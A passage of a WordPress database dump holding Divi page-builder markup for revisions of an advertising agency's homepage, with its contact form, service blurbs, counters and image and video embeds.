button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home New','','inherit','closed','closed','','564-revision-v1','','','2020-08-07 20:24:39','2020-08-07 20:24:39','',564,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/564-revision-v1/',0,'revision','',0),(616,1,'2020-08-07 20:25:31','2020-08-07 20:25:31','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\" hover_enabled=\"0\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design 